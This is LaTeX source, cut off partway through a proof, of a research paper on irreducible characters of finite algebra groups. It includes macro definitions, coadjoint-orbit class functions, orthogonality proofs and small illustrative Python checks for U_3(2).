\newcommand\un{{\underline{n}}}
\newcommand\uN{{\underline{N}}}
\newcommand\uo{{\underline{o}}}
\newcommand\uO{{\underline{O}}}
\newcommand\up{{\underline{p}}}
\newcommand\uP{{\underline{P}}}
\newcommand\uq{{\underline{q}}}
\newcommand\uQ{{\underline{Q}}}
\newcommand\ur{{\underline{r}}}
\newcommand\uR{{\underline{R}}}
\newcommand\us{{\underline{s}}}
\newcommand\uS{{\underline{S}}}
\newcommand\ut{{\underline{t}}}
\newcommand\uT{{\underline{T}}}
\newcommand\uu{{\underline{u}}}
\newcommand\uU{{\underline{U}}}
\newcommand\uv{{\underline{v}}}
\newcommand\uV{{\underline{V}}}
\newcommand\uw{{\underline{w}}}
\newcommand\uW{{\underline{W}}}
\newcommand\ux{{\underline{x}}}
\newcommand\uX{{\underline{X}}}
\newcommand\uy{{\underline{y}}}
\newcommand\uY{{\underline{Y}}}
\newcommand\uz{{\underline{z}}}
\newcommand\uZ{{\underline{Z}}}
\newcommand\ualp{{\underline{\alp}}}
\newcommand\ubet{{\underline{\bet}}}
\newcommand\uchi{{\underline{\chi}}}
\newcommand\udel{{\underline{\del}}}
\newcommand\uell{{\underline{\ell}}}
\newcommand\ueps{{\underline{\eps}}}
\newcommand\ueta{{\underline{\eta}}}
\newcommand\uGam{{\underline{\Gamma}}}
\newcommand\unu{{\underline{\nu}}}
\newcommand\uome{{\underline{\omega}}}
\newcommand\utet{{\underline{\tet}}}
\newcommand\ulam{{\underline{\lam}}}
\newcommand\hata{{\widehat{a}}}
\newcommand\hatA{{\widehat{A}}}
\newcommand\hatb{{\widehat{b}}}
\newcommand\hatB{{\widehat{B}}}
\newcommand\hatc{{\widehat{c}}}
\newcommand\hatC{{\widehat{C}}}
\newcommand\hatd{{\widehat{d}}}
\newcommand\hatD{{\widehat{D}}}
\newcommand\hate{{\widehat{e}}}
\newcommand\hatE{{\widehat{E}}}
\newcommand\hatf{{\widehat{f}}}
\newcommand\hatF{{\widehat{F}}}
\newcommand\hatg{{\widehat{g}}}
\newcommand\hatG{{\widehat{G}}}
\newcommand\hath{{\widehat{h}}}
\newcommand\hatH{{\widehat{H}}}
\newcommand\hati{{\widehat{i}}}
\newcommand\hatI{{\widehat{I}}}
\newcommand\hatj{{\widehat{j}}}
\newcommand\hatJ{{\widehat{J}}}
\newcommand\hatk{{\widehat{k}}}
\newcommand\hatK{{\widehat{K}}}
\newcommand\hatl{{\widehat{l}}}
\newcommand\hatL{{\widehat{L}}}
\newcommand\hatm{{\widehat{m}}}
\newcommand\hatM{{\widehat{M}}}
\newcommand\hatn{{\widehat{n}}}
\newcommand\hatN{{\widehat{N}}}
\newcommand\hato{{\widehat{o}}}
\newcommand\hatO{{\widehat{O}}}
\newcommand\hatp{{\widehat{p}}}
\newcommand\hatP{{\widehat{P}}}
\newcommand\hatq{{\widehat{q}}}
\newcommand\hatQ{{\widehat{Q}}}
\newcommand\hatr{{\widehat{r}}}
\newcommand\hatR{{\widehat{R}}}
\newcommand\hats{{\widehat{s}}}
\newcommand\hatS{{\widehat{S}}}
\newcommand\hatt{{\widehat{t}}}
\newcommand\hatT{{\widehat{T}}}
\newcommand\hatu{{\widehat{u}}}
\newcommand\hatU{{\widehat{U}}}
\newcommand\hatv{{\widehat{v}}}
\newcommand\hatV{{\widehat{V}}}
\newcommand\hatw{{\widehat{w}}}
\newcommand\hatW{{\widehat{W}}}
\newcommand\hatx{{\widehat{x}}}
\newcommand\hatX{{\widehat{X}}}
\newcommand\haty{{\widehat{y}}}
\newcommand\hatY{{\widehat{Y}}}
\newcommand\hatz{{\widehat{z}}}
\newcommand\hatZ{{\widehat{Z}}}
\newcommand\hatalp{{\widehat{\alpha}}}
\newcommand\hatdel{{\widehat{\delta}}}
\newcommand\hatDel{{\widehat{\Delta}}}
\newcommand\hatbet{{\widehat{\beta}}}
\newcommand\hateps{{\hat{\eps}}}
\newcommand\hatgam{{\widehat{\gamma}}}
\newcommand\hatGam{{\widehat{\Gamma}}}
\newcommand\hatlam{{\widehat{\lambda}}}
\newcommand\hatmu{{\widehat{\mu}}}
\newcommand\hatnu{{\widehat{\nu}}}
\newcommand\hatOme{{\widehat{\Ome}}}
\newcommand\hatphi{{\widehat{\phi}}}
\newcommand\hatPhi{{\widehat{\Phi}}}
\newcommand\hatpi{{\widehat{\pi}}}
\newcommand\hatpsi{{\widehat{\psi}}}
\newcommand\hatPsi{{\widehat{\Psi}}}
\newcommand\hatrho{{\widehat{\rho}}}
\newcommand\hatsig{{\widehat{\sig}}}
\newcommand\hatSig{{\widehat{\Sig}}}
\newcommand\hattau{{\widehat{\tau}}}
\newcommand\hattet{{\widehat{\theta}}}
\newcommand\hatvarphi{{\widehat{\varphi}}}
\newcommand\hatAA{{\widehat{\AA}}}
\newcommand\hatBB{{\widehat{\BB}}}
\newcommand\hatCC{{\widehat{\CC}}}
\newcommand\hatDD{{\widehat{\DD}}}
\newcommand\hatEE{{\widehat{\EE}}}
\newcommand\hatFF{{\widehat{\FF}}}
\newcommand\hatGG{{\widehat{\GG}}}
\newcommand\hatHH{{\widehat{\HH}}}
\newcommand\hatII{{\widehat{\II}}}
\newcommand\hatJJ{{\widehat{\JJ}}}
\newcommand\hatKK{{\widehat{\KK}}}
\newcommand\hatLL{{\widehat{\LL}}}
\newcommand\hatMM{{\widehat{\MM}}}
\newcommand\hatNN{{\widehat{\NN}}}
\newcommand\hatOO{{\widehat{\OO}}}
\newcommand\hatPP{{\widehat{\PP}}}
\newcommand\hatQQ{{\widehat{\QQ}}}
\newcommand\hatRR{{\widehat{\RR}}}
\newcommand\hatSS{{\widehat{\SS}}}
\newcommand\hatTT{{\widehat{\TT}}}
\newcommand\hatUU{{\widehat{\UU}}}
\newcommand\hatVV{{\widehat{\VV}}}
\newcommand\hatWW{{\widehat{\WW}}}
\newcommand\hatXX{{\widehat{\XX}}}
\newcommand\hatYY{{\widehat{\YY}}}
\newcommand\hatZZ{{\widehat{\ZZ}}}
\newcommand\tila{{\widetilde{a}}}
\newcommand\tilA{{\widetilde{A}}}
\newcommand\tilb{{\widetilde{b}}}
\newcommand\tilB{{\widetilde{B}}}
\newcommand\tilc{{\widetilde{c}}}
\newcommand\tilC{{\widetilde{C}}}
\newcommand\tild{{\widetilde{d}}}
\newcommand\tilD{{\widetilde{D}}}
\newcommand\tile{{\widetilde{e}}}
\newcommand\tilE{{\widetilde{E}}}
\newcommand\tilf{{\widetilde{f}}}
\newcommand\tilF{{\widetilde{F}}}
\newcommand\tilg{{\widetilde{g}}}
\newcommand\tilG{{\widetilde{G}}}
\newcommand\tilh{{\widetilde{h}}}
\newcommand\tilH{{\widetilde{H}}}
\newcommand\tili{{\widetilde{i}}}
\newcommand\tilI{{\widetilde{I}}}
\newcommand\tilj{{\widetilde{j}}}
\newcommand\tilJ{{\widetilde{J}}}
\newcommand\tilk{{\widetilde{k}}}
\newcommand\tilK{{\widetilde{K}}}
\newcommand\till{{\widetilde{l}}}
\newcommand\tilL{{\widetilde{L}}}
\newcommand\tilm{{\widetilde{m}}}
\newcommand\tilM{{\widetilde{M}}}
\newcommand\tiln{{\widetilde{n}}}
\newcommand\tilN{{\widetilde{N}}}
\newcommand\tilo{{\widetilde{o}}}
\newcommand\tilO{{\widetilde{O}}}
\newcommand\tilp{{\widetilde{p}}}
\newcommand\tilP{{\widetilde{P}}}
\newcommand\tilq{{\widetilde{q}}}
\newcommand\tilQ{{\widetilde{Q}}}
\newcommand\tilr{{\widetilde{r}}}
\newcommand\tilR{{\widetilde{R}}}
\newcommand\tils{{\widetilde{s}}}
\newcommand\tilS{{\widetilde{S}}}
\newcommand\tilt{{\widetilde{t}}}
\newcommand\tilT{{\widetilde{T}}}
\newcommand\tilu{{\widetilde{u}}}
\newcommand\tilU{{\widetilde{U}}}
\newcommand\tilv{{\widetilde{v}}}
\newcommand\tilV{{\widetilde{V}}}
\newcommand\tilw{{\widetilde{w}}}
\newcommand\tilW{{\widetilde{W}}}
\newcommand\tilx{{\widetilde{x}}}
\newcommand\tilX{{\widetilde{X}}}
\newcommand\tily{{\widetilde{y}}}
\newcommand\tilY{{\widetilde{Y}}}
\newcommand\tilz{{\widetilde{z}}}
\newcommand\tilZ{{\widetilde{Z}}}
\newcommand\tilalp{{\widetilde{\alpha}}}
\newcommand\tilbet{{\widetilde{\beta}}}
\newcommand\tildel{{\widetilde{\delta}}}
\newcommand\tilDel{{\widetilde{\Delta}}}
\newcommand\tilchi{{\widetilde{\chi}}}
\newcommand\tileta{{\widetilde{\eta}}}
\newcommand\tilgam{{\widetilde{\gamma}}}
\newcommand\tilGam{{\widetilde{\Gamma}}}
\newcommand\tilome{{\widetilde{\ome}}}
\newcommand\tillam{{\widetilde{\lam}}}
\newcommand\tilmu{{\widetilde{\mu}}}
\newcommand\tilphi{{\widetilde{\phi}}}
\newcommand\tilpi{{\widetilde{\pi}}}
\newcommand\tilpsi{{\widetilde{\psi}}}
\renewcommand\tilome{{\widetilde{\ome}}}
\newcommand\tilOme{{\widetilde{\Ome}}}
\newcommand\tilPhi{{\widetilde{\Phi}}}
\newcommand\tilQQ{{\widetilde{\QQ}}}
\newcommand\tilrho{{\widetilde{\rho}}}
\newcommand\tilsig{{\widetilde{\sig}}}
\newcommand\tiltau{{\widetilde{\tau}}}
\newcommand\tiltet{{\widetilde{\theta}}}
\newcommand\tilvarphi{{\widetilde{\varphi}}}
\newcommand\tilxi{{\widetilde{\xi}}}
\newcommand\dta{{\dot{a}}}
\newcommand\dtA{{\dot{A}}}
\newcommand\dtb{{\dot{b}}}
\newcommand\dtB{{\dot{B}}}
\newcommand\dtc{{\dot{c}}}
\newcommand\dtC{{\dot{C}}}
\newcommand\dtd{{\dot{d}}}
\newcommand\dtD{{\dot{D}}}
\newcommand\dte{{\dot{e}}}
\newcommand\dtE{{\dot{E}}}
\newcommand\dtf{{\dot{f}}}
\newcommand\dtF{{\dot{F}}}
\newcommand\dtg{{\dot{g}}}
\newcommand\dtG{{\dot{G}}}
\newcommand\dth{{\dot{h}}}
\newcommand\dtH{{\dot{H}}}
\newcommand\dti{{\dot{i}}}
\newcommand\dtI{{\dot{I}}}
\newcommand\dtj{{\dot{j}}}
\newcommand\dtJ{{\dot{J}}}
\newcommand\dtk{{\dot{k}}}
\newcommand\dtK{{\dot{K}}}
\newcommand\dtl{{\dot{l}}}
\newcommand\dtL{{\dot{L}}}
\newcommand\dtm{{\dot{m}}}
\newcommand\dtM{{\dot{M}}}
\newcommand\dtn{{\dot{n}}}
\newcommand\dtN{{\dot{N}}}
\newcommand\dto{{\dot{o}}}
\newcommand\dtO{{\dot{O}}}
\newcommand\dtp{{\dot{p}}}
\newcommand\dtP{{\dot{P}}}
\newcommand\dtq{{\dot{q}}}
\newcommand\dtQ{{\dot{Q}}}
\newcommand\dtr{{\dot{r}}}
\newcommand\dtR{{\dot{R}}}
\newcommand\dts{{\dot{s}}}
\newcommand\dtS{{\dot{S}}}
\newcommand\dtt{{\dot{t}}}
\newcommand\dtT{{\dot{T}}}
\newcommand\dtu{{\dot{u}}}
\newcommand\dtU{{\dot{U}}}
\newcommand\dtv{{\dot{v}}}
\newcommand\dtV{{\dot{V}}}
\newcommand\dtw{{\dot{w}}}
\newcommand\dtW{{\dot{W}}}
\newcommand\dtx{{\dot{x}}}
\newcommand\dtX{{\dot{X}}}
\newcommand\dty{{\dot{y}}}
\newcommand\dtY{{\dot{Y}}}
\newcommand\dtz{{\dot{z}}}
\newcommand\dtZ{{\dot{Z}}}
\newcommand\rank{\operatorname{rank}}
\newcommand\irr{\operatorname{Irr}}
\renewcommand{\hom}{\operatorname{Hom}}
\renewcommand{\lvert}{\left|}
\renewcommand{\rvert}{\right|}
\renewcommand{\+}{\oplus}
\newcommand{\bas}[2]{\left( {#1}_{1}, \ldots, {#1}_{#2} \right)}
\newcommand{\seq}[2]{{#1}_{1}, \ldots, {#1}_{#2}}
\newcommand\dsty[1]{{\displaystyle #1}}
\newcommand{\al}[1]{\item[{\rm (#1)}]}
\newcommand{\calO}{{\mathcal{O}}}
\newcommand{\bfOme}{{\mathbf{\Omega}}}
\newcommand{\ord}[1]{\lvert #1 \rvert}
\newcommand{\imp}[2]{\text{(#1)} \Rightarrow \text{(#2)}}
\newcommand{\impd}[2]{\text{(#1)} \Leftrightarrow \text{(#2)}}
\newcommand{\gl}[1]{\mathfrak{gl}_{#1}(q)}
\newcommand{\apl}[3]{#1 \colon #2 \rightarrow #3}
\newcommand{\symat}[2]{\begin{bmatrix} #1 & 0 \\ #2 #1 & #1^{-tr} \end{bmatrix}}
\newcommand{\isymat}[2]{\begin{bmatrix} #1^{-1} & 0 \\ -x^{tr} a & #1^{tr} \end{bmatrix}}
\newcommand{\nsymat}[2]{\begin{bmatrix} #1 & 0 \\ #2 & -#1^{tr} \end{bmatrix}}
\newcommand{\dmat}[2]{\begin{bmatrix} #1 & 0 \\ 0 & #2 \end{bmatrix}}
\ShowLabelsfalse
\begin{document}
\title[Irreducible characters of finite algebra groups]{Irreducible
characters of finite algebra groups}
\author[C.~A.~M.~Andr\'e]{Carlos A. M. Andr\'e}
\thanks{This research was carried out as part of the PRAXIS XXI
Project 2/2.1/MAT/73/94.}
\address{Departamento de Matem\'atica, Faculdade de Ci\^encias da
Universidade de Lisboa, Rua Ernesto de Vasconcelos, Bloco C1, Piso 3,
1700 LISBOA, PORTUGAL}
\email{candre@fc.ul.pt}
\maketitle
\sec{intro}{Introduction}
Let $p$ be a prime number, let $q = p^{e}$ ($e \geq 1$) be a power of
$p$ and let $\mathbb{F}_{q}$ denote the finite field with $q$ elements. Let $A$ be
a finite dimensional $\mathbb{F}_{q}$-algebra. (Throughout the paper, all algebras
are assumed to have an identity element.) Let $J = J(A)$ be the Jacobson
radical of $A$ and let $$G = 1+J = \left\{ 1+a \colon a \in A \right\}.$$
Then $G$ is a $p$-subgroup of the group of units of $A$. Following
\cite{isaacs1}, we refer to a group arising in this way as an {\bf
$\mathbb{F}_{q}$-algebra group}. As an example, let $J = \fru_{n}(q)$ be the
$\mathbb{F}_{q}$-space consisting of all nilpotent upper triangular $n \times n$
matrices over $\mathbb{F}_{q}$. Then $J$ is the Jacobson radical of the
$\mathbb{F}_{q}$-algebra $A = \mathbb{F}_{q} \cdot 1 + J$ and the $p$-group $G = 1+J$ is the
group $U_{n}(q)$ consisting of all unipotent upper triangular $n
\times n$ matrices over $\mathbb{F}_{q}$.
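As a concrete (purely illustrative) sanity check of this example, the following sketch fixes the hypothetical tiny parameters $q = 2$, $n = 3$, builds $J = \fru_{3}(2)$ and the algebra group $G = 1 + J = U_{3}(2)$, and confirms that $G$ is closed under multiplication with $\ord{G} = q^{n(n-1)/2} = 8$; none of this is part of the argument, and the choice of parameters is an assumption made only for the demonstration.

```python
import itertools
import numpy as np

q, n = 2, 3   # hypothetical small case U_3(2); the paper allows any prime power q

# J = u_n(q): all strictly upper-triangular (hence nilpotent) n x n matrices
pos = [(i, j) for i in range(n) for j in range(i + 1, n)]
J = []
for vals in itertools.product(range(q), repeat=len(pos)):
    a = np.zeros((n, n), dtype=int)
    for (i, j), v in zip(pos, vals):
        a[i, j] = v
    J.append(a)

I = np.eye(n, dtype=int)
G = [(I + a) % q for a in J]   # the algebra group G = 1 + J

# closure: (1+a)(1+b) = 1 + (a + b + ab), and a + b + ab lies in J again
keys = {x.tobytes() for x in G}
assert all(((x @ y) % q).tobytes() in keys for x in G for y in G)
print(len(G))   # |G| = q^{n(n-1)/2} = 8, a group of q-power order
```

The closure check mirrors the identity $(1+a)(1+b) = 1 + (a + b + ab)$, which is exactly why $1 + U$ is a subgroup for any multiplicatively closed subspace $U$.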
A subgroup $H$ of an $\mathbb{F}_{q}$-algebra group $G$ is said to be an {\bf
algebra subgroup} of $G$ if $H = 1+U$ for some multiplicatively closed
$\mathbb{F}_{q}$-subspace $U$ of $J$. It is clear that an algebra subgroup of $G$
is itself an $\mathbb{F}_{q}$-algebra group and that it has $q$-power index in $G$.
The main purpose of this paper is to prove the following result.
(Throughout this paper, all characters are taken over the complex
field.)
\th{main}
Let $G$ be an $\mathbb{F}_{q}$-algebra group and let $\chi$ be an irreducible
character of $G$. Then there exist an algebra subgroup $H$ of $G$ and
a linear character $\lam$ of $H$ such that $\chi = \lam^{G}$.
\eth
As a consequence, we obtain Theorem~A of \cite{isaacs1} (see also
\cite[Theorem~26.7]{huppert}) which asserts
that all irreducible characters of an (arbitrary) $\mathbb{F}_{q}$-algebra group
have $q$-power degree. (However, this result will be used in the proof of
\reft{main}.) Following the terminology of \cite{isaacs1}, we say that
a finite group $G$ is a {\it $q$-power-degree group} if every
irreducible character of $G$ has $q$-power degree. Hence,
\cite[Theorem~A]{isaacs1} asserts that every $\mathbb{F}_{q}$-algebra group is a
$q$-power-degree group. In particular, the unitriangular group $U_{n}(q)$
is a $q$-power-degree group (which is precisely the statement of
\cite[Corollary~B]{isaacs1}). On the other hand, our \reft{main} generalizes
Theorem~C of \cite{isaacs1} and answers the question raised by I.~M.~Isaacs
immediately before that theorem. We note, moreover, that the statement
of our \reft{main} is precisely the assertion made by E.~A.~Gutkin in
\cite{gutkin}. The argument used by Gutkin to prove this assertion was
defective and a counterexample was given by Isaacs to illustrate its flaw
(see Section~10 of \cite{isaacs1}).
A result similar to our \reft{main} was proved by D.~Kazhdan for the
group $G = U_{n}(q)$ in the case where $p \geq n$. Kazhdan's result appears
in the paper \cite{kazhdan} (see also \cite[Theorem~7.7]{srinivasan}) and
applies to other finite unipotent algebraic groups. However, Kazhdan imposes
a restriction on the prime $p$ in order to use the exponential map.
In this paper, we replace the exponential map by the bijection $J
\rightarrow 1+J$ defined by the (natural) correspondence $a \mapsto
1+a$. Then we follow Kazhdan's idea and we use Kirillov's method of
coadjoint orbits (see, for example, \cite{kirillov1}) to parametrize
the irreducible characters of the $\mathbb{F}_{q}$-algebra group $G = 1+J$.
\sec{class}{Class functions associated with coadjoint orbits}
Let $J = J(A)$, where $A$ is a finite dimensional $\mathbb{F}_{q}$-algebra, and
let $G = 1+J$. Let $J^{*} = \hom_{\mathbb{F}_{q}}(J, \mathbb{F}_{q})$ be the dual space of
$J$ and let $\psi$ be an arbitrary non-trivial linear character of
the additive group ${\mathbb{F}_{q}}^{+}$ of the field $\mathbb{F}_{q}$. For each $f \in
J^{*}$, let $\psi_{f} \colon J \rightarrow \CC$ be the map defined by
\eq{psi}
\psi_{f}(a) = \psi(f(a))
\end{equation}
for all $a \in J$. Then $\psi_{f}$ is a linear character of the additive
group $J^{+}$ of $J$ and, in fact,
\eq{irrJ}
\irr(J^{+}) = \left\{ \psi_{f} \colon f \in J^{*} \right\}.
\end{equation}
(For any finite group $X$, we denote by $\irr(X)$ the set of all
irreducible characters of $X$.)
The group $G$ acts on $J^{*}$ by $(x \cdot f)(a) = f(x^{-1} a x)$ for
all $x \in G$, all $f \in J^{*}$ and all $a \in J$. (Usually, we refer
to this action as the {\bf coadjoint action} of $G$.) Let $\bfOme(G)$
denote the set of all $G$-orbits on $J^{*}$. We claim that the
cardinality $\ord{\calO}$ of any $G$-orbit $\calO \in \bfOme(G)$ is a
$q^{2}$-power. To see this, let $f \in J^{*}$ be arbitrary and
define $B_{f} \colon J \times J \rightarrow \mathbb{F}_{q}$ by
\eq{Bf}
B_{f}(a,b) = f([ab])
\end{equation}
for all $a,b \in J$ (here $[ab]=ab-ba$ is the usual Lie product of $a,b
\in J$). Then $B_{f}$ is a skew-symmetric $\mathbb{F}_{q}$-bilinear form. Let $n =
\dim J$, let $\bas{e}{n}$ be an $\mathbb{F}_{q}$-basis of $J$ and let $M(f)$ be the
skew-symmetric matrix which represents $B_{f}$ with respect to this basis.
Then $M(f)$ has even rank (see, for example, \cite[Theorem~8.6.1]{cohn}).
Let $$\operatorname{Rad}(f) = \left\{ a \in J \colon f([ab]) = 0 \text{ for all } b \in J \right\}$$ be
the radical of $B_{f}$. Then $\operatorname{Rad}(f)$ is an $\mathbb{F}_{q}$-subspace of $J$ and
\eq{rad}
\dim \operatorname{Rad}(f) = \dim J - \rank M(f).
\end{equation}
We have the following result.
\prop{rad}
Let $f \in J^{*}$ be arbitrary. Then $\operatorname{Rad}(f)$ is a multiplicatively
closed $\mathbb{F}_{q}$-subspace of $J$. Moreover, the centralizer $C_{G}(f)$
of $f$ in $G$ is the algebra subgroup $1+\operatorname{Rad}(f)$ of $G$. In
particular, if $\calO \in \bfOme(G)$ is the $G$-orbit which contains
$f$, then $\ord{\calO} = q^{\rank M(f)}$ is a $q^{2}$-power.
\end{propos}
\begin{proof}
Since $[ab,c] = [a,bc] + [b,ca]$, we clearly have $f([ab,c]) = 0$
for all $a, b \in \operatorname{Rad}(f)$ and all $c \in J$. Thus $\operatorname{Rad}(f)$ is
multiplicatively closed.
On the other hand, let $x \in G$ be arbitrary. Then $x \in C_{G}(f)$
if and only if $f(x^{-1} bx) = f(b)$ for all $b \in J$. Hence $x \in
C_{G}(f)$ if and only if $f(bx) = f(xb)$ for all $b \in J$. Now, let
$a = x-1 \in J$. Then $f(bx) = f(b) + f(ba)$ and $f(xb) = f(b) +
f(ab)$, and so $f([ab]) = f(xb) - f(bx)$ for all $b \in J$. It
follows that $x \in C_{G}(f)$ if and only if $a \in \operatorname{Rad}(f)$.
For the last assertion, we note that $\ord{G} = \ord{C_{G}(f)} \cdot
\ord{\calO}$, that $\ord{G} = q^{\dim J}$ and (as we have just proved)
that $\ord{C_{G}(f)} = q^{\dim \operatorname{Rad}(f)}$. Therefore, by \refe{rad},
we deduce that $\ord{\calO} = q^{\dim J - \dim \operatorname{Rad}(f)} = q^{\rank M(f)}$.
\end{proof}
For each $\calO \in \bfOme(G)$, we define the function $\phi_{\calO} \colon
G \rightarrow \CC$ by the rule
\eq{class}
\phi_{\calO}(1+a) = \frac{1}{\sqrt{\ord{\calO}}} \sum_{f \in \calO}
\psi_{f}(a)
\end{equation}
for all $a \in J$. It is clear that $\phi_{\calO}$ is a class function of
$G$ of degree
\eq{degree}
\phi_{\calO}(1) = \sqrt{\ord{\calO}} = q^{\frac{1}{2} \rank M(f)}
\end{equation}
where $M(f)$ is as before. Moreover, we have the following result.
\prop{ortho}
The set $\left\{ \phi_{\calO} \colon \calO \in \bfOme(G) \right\}$ is an orthonormal
basis for the $\CC$-space $\operatorname{cf}(G)$ consisting of all class functions on
$G$. In particular, we have $$\frac{1}{\ord{G}} \sum_{x \in G}
\phi_{\calO}(x) \overline{\phi_{\calO^{\prime}}(x)} = \del_{\calO, \calO^{\prime}}$$ for all
$\calO, \calO^{\prime} \in \bfOme(G)$. (Here, $\del$ denotes the usual Kronecker
symbol.)
\end{propos}
\begin{proof}
Let $\left\langle \cdot , \cdot \right\rangle_{G}$ denote the Frobenius scalar product
on $\operatorname{cf}(G)$. Let $\calO, \calO^{\prime} \in \bfOme(G)$ be arbitrary. Then
\begin{eqnarray*}
\left\langle \phi_{\calO}, \phi_{\calO^{\prime}} \right\rangle_{G} & = & \frac{1}{\ord{G}}
\sum_{x \in G} \phi_{\calO}(x) \overline{\phi_{\calO^{\prime}}(x)} \\
& = & \frac{1}{\ord{J}}\sum_{a \in J} \frac{1}{\sqrt{\ord{\calO}}}
\frac{1}{\sqrt{\ord{\calO^{\prime}}}} \sum_{f \in \calO} \sum_{f^{\prime} \in \calO^{\prime}}
\psi_{f}(a) \overline{\psi_{f^{\prime}}(a)} \\
& = & \frac{1}{\sqrt{\ord{\calO}}} \frac{1}{\sqrt{\ord{\calO^{\prime}}}}
\sum_{f \in \calO} \sum_{f^{\prime} \in \calO^{\prime}} \left(
\frac{1}{\ord{J}}\sum_{a \in J} \psi_{f}(a) \overline{\psi_{f^{\prime}}(a)}
\right) \\
\end{eqnarray*}
\begin{eqnarray*}
\phantom{\left\langle \phi_{\calO}, \phi_{\calO^{\prime}} \right\rangle_{G}}
& = & \frac{1}{\sqrt{\ord{\calO}}} \frac{1}{\sqrt{\ord{\calO^{\prime}}}}
\sum_{f \in \calO} \sum_{f^{\prime} \in \calO^{\prime}} \left\langle \psi_{f}, \psi_{f^{\prime}}
\right\rangle_{J^{+}} \\
& = & \frac{1}{\sqrt{\ord{\calO}}} \frac{1}{\sqrt{\ord{\calO^{\prime}}}}
\sum_{f \in \calO}
\sum_{f^{\prime} \in \calO^{\prime}} \del_{f,f^{\prime}}
\end{eqnarray*}
(using \refe{irrJ}) and so $$\left\langle \phi_{\calO}, \phi_{\calO^{\prime}} \right\rangle_{G} =
\del_{\calO, \calO^{\prime}}.$$
To conclude the proof, we claim that $\ord{\bfOme(G)}$ equals the class
number $k_{G}$ of $G$; we recall that $k_{G} = \dim_{\CC} \operatorname{cf}(G)$
(see, for example, \cite[Corollary~2.7 and Theorem~2.8]{isaacs2}).
Firstly, we observe that $k_{G}$ is the number of $G$-orbits on $J$ for
the {\it adjoint action}: $x \cdot a = xax^{-1}$ for all $x \in G$ and
all $a \in J$. Let $\tet$ be the permutation character of $G$ on $J$
(see \cite{isaacs2} for the definition). Then, by
\cite[Corollary~5.15]{isaacs2}, $$k_{G} = \left\langle \tet, 1_{G} \right\rangle_{G}.$$
Moreover, by definition, we have $$\tet(x) = \ord{\left\{ a \in J \colon x
\cdot a = a \right\}}$$ for all $x \in G$.
On the other hand, consider the action of $G$ on $\irr(J^{+})$ given by
$$x \cdot \psi_{f} = \psi_{x \cdot f}$$ for all $x \in G$ and all $f \in
J^{*}$. We clearly have $$(x \cdot \psi_{f})(x \cdot a) = \psi_{f}(a)$$
for all $x \in G$, all $f \in J^{*}$ and all $a \in J$. It follows from
Brauer's Theorem (see \cite[Theorem~6.32]{isaacs2}) that $$\tet(x) =
\ord{\left\{ f \in J^{*} \colon x \cdot \psi_{f} = \psi_{f} \right\}}$$ for all
$x \in G$. Therefore, $\tet$ is also the permutation character of $G$
on $\irr(J^{+})$ and so $$\left\langle \tet, 1_{G} \right\rangle_{G} = \ord{\bfOme(G)}.$$
The claim follows and the proof is complete.
\end{proof}
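Both claims of \refp{ortho} can be observed directly in the running toy case $J = \fru_{3}(2)$ (an assumption made only for illustration, with $\psi(t) = (-1)^{t}$ as the non-trivial linear character of $\mathbb{F}_{2}^{+}$): the sketch below checks that the $\phi_{\calO}$ are orthonormal under the Frobenius scalar product and that $\ord{\bfOme(G)}$ equals the class number $k_{G}$.

```python
import itertools
import numpy as np

q, n = 2, 3                                      # toy case J = u_3(2), G = U_3(2)
basis = [(i, j) for i in range(n) for j in range(i + 1, n)]
I = np.eye(n, dtype=int)

def unit(i, j):
    e = np.zeros((n, n), dtype=int)
    e[i, j] = 1
    return e

G = []
for vals in itertools.product(range(q), repeat=len(basis)):
    a = sum(v * unit(i, j) for (i, j), v in zip(basis, vals))
    G.append((I + a) % q)

def inv(x):
    a, y, p = (x - I) % q, I.copy(), I.copy()
    for _ in range(1, n):
        p = (-p @ a) % q
        y = (y + p) % q
    return y

def fval(f, m):
    return sum(c * m[r, s] for c, (r, s) in zip(f, basis)) % q

def coad(x, f):
    xi = inv(x)
    return tuple(fval(f, (xi @ unit(i, j) @ x) % q) for (i, j) in basis)

left = set(itertools.product(range(q), repeat=len(basis)))
orbits = []
while left:
    f = next(iter(left))
    O = frozenset(coad(x, f) for x in G)
    left -= O
    orbits.append(O)

def phi(O, x):
    # phi_O(1+a) = |O|^{-1/2} sum_{f in O} psi(f(a)), with psi(t) = (-1)^t over F_2
    a = (x - I) % q
    return sum((-1) ** fval(f, a) for f in O) / len(O) ** 0.5

# orthonormality under the Frobenius product (phi is real here since q = 2)
for O1 in orbits:
    for O2 in orbits:
        ip = sum(phi(O1, x) * phi(O2, x) for x in G) / len(G)
        assert abs(ip - (1.0 if O1 == O2 else 0.0)) < 1e-9

# |Omega(G)| equals the class number k_G of G
classes = {frozenset(((inv(z) @ x @ z) % q).tobytes() for z in G) for x in G}
print(len(orbits), len(classes))   # 5 5
```

Here the four singleton orbits yield the four linear characters of $G = U_{3}(2)$ and the orbit of size $4$ yields its unique irreducible character of degree $2$, consistent with \reft{irred} below.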
We will prove (see \reft{irred} in \refs{irred}) that $$\irr(G) = \left\{
\phi_{\calO} \colon \calO \in \bfOme(G) \right\}.$$ (This is the key to the proof
of \reft{main}.) Therefore, the next result will of course be a
consequence of that theorem. However, we give below a very easy proof
(independent of \reft{irred}) of the second orthogonality relations for
the functions $\phi_{\calO}$ for $\calO \in \bfOme(G)$.
\prop{ortho2}
Let $x, y \in G$ be arbitrary. Then $$\sum_{\calO \in \bfOme(G)}
\phi_{\calO}(x) \overline{\phi_{\calO}(y)} = \begin{cases} \ord{C_{G}(x)}, &
\text{if $x$ and $y$ are $G$-conjugate,} \\ 0, & \text{otherwise.}
\end{cases}$$
\end{propos}
\begin{proof}
Let $a = x - 1$ and $b = y - 1$. Then
\begin{eqnarray*}
\sum_{\calO \in \bfOme(G)} \phi_{\calO}(x) \overline{\phi_{\calO}(y)} & = &
\sum_{\calO \in \bfOme(G)} \frac{1}{\ord{\calO}} \sum_{f \in \calO} \sum_{g
\in \calO} \psi_{f}(a) \overline{\psi_{g}(b)} \\
& = & \sum_{\calO \in \bfOme(G)} \frac{1}{\ord{\calO}} \sum_{f \in \calO}
\frac{1}{\ord{C_{G}(f)}} \sum_{z \in G} \psi_{f}(a)
\overline{\psi_{f}(z^{-1} b z)} \\
& = & \sum_{\calO \in \bfOme(G)} \sum_{f \in \calO} \frac{1}{\ord{G}}
\sum_{z \in G} \psi_{f}(a - z^{-1} bz) \\
& = & \frac{1}{\ord{G}} \sum_{z \in G} \sum_{f \in J^{*}}
\psi_{f}(a - z^{-1} bz) \\
& = & \frac{1}{\ord{G}} \sum_{z \in G} \rho_{J^{+}}(a - z^{-1} bz)
\end{eqnarray*}
where $\rho_{J^{+}}$ denotes the regular character of $J^{+}$.
